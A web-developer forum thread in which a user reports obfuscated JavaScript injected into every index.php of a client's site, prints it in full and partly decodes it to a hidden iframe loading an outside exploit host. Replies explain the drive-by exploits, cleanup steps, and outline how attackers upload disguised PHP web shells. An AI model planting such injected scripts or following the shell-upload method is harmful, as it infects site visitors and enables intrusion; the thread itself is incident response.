SitePoint Sponsor

User Tag List

Results 1 to 11 of 11
  1. #1
    Hibernator YuriKolovsky's Avatar
    Join Date
    Nov 2007
    Location
    Malaga, Spain
    Posts
    1,072
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)

    yet another attack on a website, how?!

    yet another attack on a website, this time on a php/linux server this line of code was added to the end of each of the index.php pages including every subfolder...

    Code JavaScript:
     
    <script>function v4ae51ba66ac2b(v4ae51ba66b3fa){ function v4ae51ba66bbca () {var v4ae51ba66c399=16; return v4ae51ba66c399;} return(parseInt(v4ae51ba66b3fa,v4ae51ba66bbca()));}function v4ae51ba66cb69(v4ae51ba66d338){  var v4ae51ba66db08='';for(v4ae51ba66e2d7=0; v4ae51ba66e2d7<v4ae51ba66d338.length; v4ae51ba66e2d7+=2){ v4ae51ba66db08+=(String.fromCharCode(v4ae51ba66ac2b(v4ae51ba66d338.substr(v4ae51ba66e2d7, 2))));}return v4ae51ba66db08;} document.write(v4ae51ba66cb69('3C696672616D65206E616D653D2765613338393636373627207372633D27687474703A2F2F666F7274726166662E636F6D2F676F2E7068703F7369643D31272077696474683D353639206865696768743D313332207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>

    then every page loaded triggered a "Virus Js/psyme Found" in my antivirus.
    the database seems to be correct (does no look like sql injection)

    my question is, HOW ARE THEY DOING THIS!??!

  2. #2
    Hibernator YuriKolovsky's Avatar
    Join Date
    Nov 2007
    Location
    Malaga, Spain
    Posts
    1,072
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    i have decoded it this far...

    Code JavaScript:
    <script>function v4ae51ba66ac2b(v4ae51ba66b3fa){ function v4ae51ba66bbca () {var v4ae51ba66c399=16; return 
     
    v4ae51ba66c399;} return(parseInt(v4ae51ba66b3fa,v4ae51ba66bbca()));}function 
     
    v4ae51ba66cb69(v4ae51ba66d338){  var v4ae51ba66db08='';for(v4ae51ba66e2d7=0; 
     
    v4ae51ba66e2d7<v4ae51ba66d338.length; v4ae51ba66e2d7+=2){ 
     
    v4ae51ba66db08+=(String.fromCharCode(v4ae51ba66ac2b(v4ae51ba66d338.substr(v4ae51ba66e2d7, 2))));}return 
     
    v4ae51ba66db08;} document.write(v4ae51ba66cb69('<iframe name='ea3896676' 
     
    src='http:?//fortraff.com/go.php?sid=1' width=569 height=132??style='display:none'></iframe>'));</script>


    yet i still have no idea what encoding "v4ae51ba66ac2b" is in...
    and im still clueless on how they inserted this on my pages, so any insight is greatly appreciated.

  3. #3
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    all this does is to execute two exploits. One being the infamous "directshow" exploit, while the other being the equally infamous "pdf" exploit. you can read more about it in this earlier post about it.

    This script/iframe uses another crypted script to trie hide it's content, but in the end it triggers those same type of exploits (pdf & directshow)

    and I guess it's the same 'ol story about this attack, as goes something likes this:

    man runs a webpage, premade script or CMS/forums etc which has a vulnerability. scriptkiddie runs an exploit scanner/vulnerability scanner (c99shell/c99madshell or similar) and while scanning ip ranges he finds vulnerble site of your, he then goes to action and trigger an injection attack rewriting some pages with an IFRAME which again triggers the fil containing the exploit.. the exploit is then triggered by all visitors of the certain page(s) and everyone vulnerable of this exploit is infected and will infect others etc etc..and etc......

    anyway, clean your files and folders and replace them with new fresh ones (and not an infected backup), update every script,cms/services etc and even change passwords. also do a search and scan on your local files/puter.
    Who's to doom when the judge himself is dragged before the bar


  4. #4
    Hibernator YuriKolovsky's Avatar
    Join Date
    Nov 2007
    Location
    Malaga, Spain
    Posts
    1,072
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    what happened:
    well, this was a website i worked on, and i delivered the code for the website as promised...the server setup and all that he did himself...

    suddenly one day he tells me that his antivirus alerts him of viruses when he loads the site
    i open the site in firefox sandboxed, check the source, see the script at the end, save a sample file in a safe folder, replace all other files with backed up clean files

    man runs a webpage, premade script or CMS/forums etc which has a vulnerability
    nope, custom code, and i took care not to have any vulnerabilities!
    i mean the real question is, how can the hacker modify my files, even the static files... that don't contain any scripts??

    anyway, clean your files and folders and replace them with new fresh ones (and not an infected backup), update every script,cms/services etc and even change passwords. also do a search and scan on your local files/puter.
    yea yea, all done.

    thanks for the link , i haven't read it yet, lets see if it tells me how to prevent this in the future.

    edit:
    your link leads me to some blank sitepoint post that triggers a vulnerability alert...

    edit:
    currently reading about the 2 exploits.
    i would really like to know about this in depth.

  5. #5
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    Quote Originally Posted by YuriKolovsky
    what happened:
    well, this was a website i worked on, and i delivered the code for the website as promised...the server setup and all that he did himself...
    so he can have some other vulnerabilities in SW/scripts/server that you do not know of

    Quote Originally Posted by YuriKolovsky
    suddenly one day he tells me that his antivirus alerts him of viruses when he loads the site
    i open the site in firefox sandboxed, check the source, see the script at the end, save a sample file in a safe folder, replace all other files with backed up clean files
    he can have a virus on his local puter, or he may run some other services or softwares/scripts on his server which is vulnerable

    Quote Originally Posted by YuriKolovsky
    nope, custom code, and i took care not to have any vulnerabilities!
    i mean the real question is, how can the hacker modify my files, even the static files... that don't contain any scripts??
    maybe it's not about your code, maybe your customer has a service, software or script made by other on his server.

    I could suggest that the attacker bruteforced the pw, but as this type of attack is very common and almost always (AFAIK) uses some security/vulnerability scanners to discover vulnerable servers/webpages/scripts I would say this is done remotely with perhaps the c99shell or c99madshell or some similar scanners.

    It doesn't have to be a script, it can be a virus on his pc, or it can be a service that runs on the server that needs to be updated or it can be some type of script from some type of SW.


    Quote Originally Posted by YuriKolovsky
    edit:
    your link leads me to some blank sitepoint post that triggers a vulnerability alert...
    ?

    Quote Originally Posted by YuriKolovsky
    edit:
    currently reading about the 2 exploits.
    i would really like to know about this in depth.
    they are using quite advanced techniques

    you can read some more about it here and here
    Who's to doom when the judge himself is dragged before the bar


  6. #6
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    Quote Originally Posted by YuriKolovsky View Post
    edit:
    your link leads me to some blank sitepoint post that triggers a vulnerability alert...
    no worry, your virus app are detecting the code/scripts that's been used in the thread.
    Who's to doom when the judge himself is dragged before the bar


  7. #7
    Hibernator YuriKolovsky's Avatar
    Join Date
    Nov 2007
    Location
    Malaga, Spain
    Posts
    1,072
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    no worry, your virus app are detecting the code/scripts that's been used in the thread.
    oh :O, ok, ill disable the antivirus temporarily.

    thanks again for the details! ill post if i have any more questions after reading the articles.

  8. #8
    Hibernator YuriKolovsky's Avatar
    Join Date
    Nov 2007
    Location
    Malaga, Spain
    Posts
    1,072
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    as a parallel question [while im reading all the articles/posts] what would you do in this situation? after replacing the affected files that is.

  9. #9
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    Quote Originally Posted by YuriKolovsky
    as a parallel question [while im reading all the articles/posts] what would you do in this situation? after replacing the affected files that is.
    I would make sure my client told me everything and that he really did clean his files and folders, I would also ask him to look for suspicious files/jpg/gif/swf/mov etc as some backdoor may be installed and using a fake extension to hide.

    I would also make sure he updated any sw running on his server and make sure he scanned his local puter and checked his files before uploading new ones.

    But before this I would ask him to change his passwords for that server.

    I would trie as best I could to urge him to check really hard for any unknown or suspicious files as this is a popular method of hiding scripts and backdoors.

    Ask him to check all the logs; - and wish him good luck

    many people gets hacked again and again because they back up their files with infected ones.
    Who's to doom when the judge himself is dragged before the bar


  10. #10
    Hibernator YuriKolovsky's Avatar
    Join Date
    Nov 2007
    Location
    Malaga, Spain
    Posts
    1,072
    Mentioned
    4 Post(s)
    Tagged
    0 Thread(s)
    can i ask you, how are they activating the backdoors? is it with a http request?

  11. #11
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    in many cases they use a http request both to look for vulnerabilities, execute, upload, inject and you name it

    the shell I mention is just one thing in a packet with tools from some russians.
    the packet i am talking about have a few shellscript, vulnerability scanners and exploits in it, but there are so many tools out there.

    you can scan (or even do a google search for spesific urls) to find webpages that may be vulnerable.
    the scanners scans fot various known vulnerabilities and when it finds one, you can read what and pick an suitable exploit from the collection within the library - or go look for it other places.

    some of these you can put directly in the address bar of the browser while others can be executet from the vulnerability scanner.

    think of this scenario:

    you find a host that you can up an image to.. you disguise the php file as an image an up it, you go to the address of it and then runs it like a full function php script (c99shell,r57,madshell etc) this have an advanced control panel which let you up files using ftp, let you scan other hosts for vulnerabilities, run http requests, execute and run code etc..., you can even control it from IRC

    now you can use this host and tools to scan other hosts for vulnerabilities and execute various exploits against them.

    as for injection attacks there are tons of queries laying around you can dl to test it out yourself, just do a google search. there are tutorials and papers written to ensure your success doing it, it is so well documented that if you really wanna try doing something like this, you will not fail - even if you are quite a novice.

    In many cases a cut 'n paste is all whats needed... that, and people not updating their systems is what makes it all scary!
    Who's to doom when the judge himself is dragged before the bar



Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •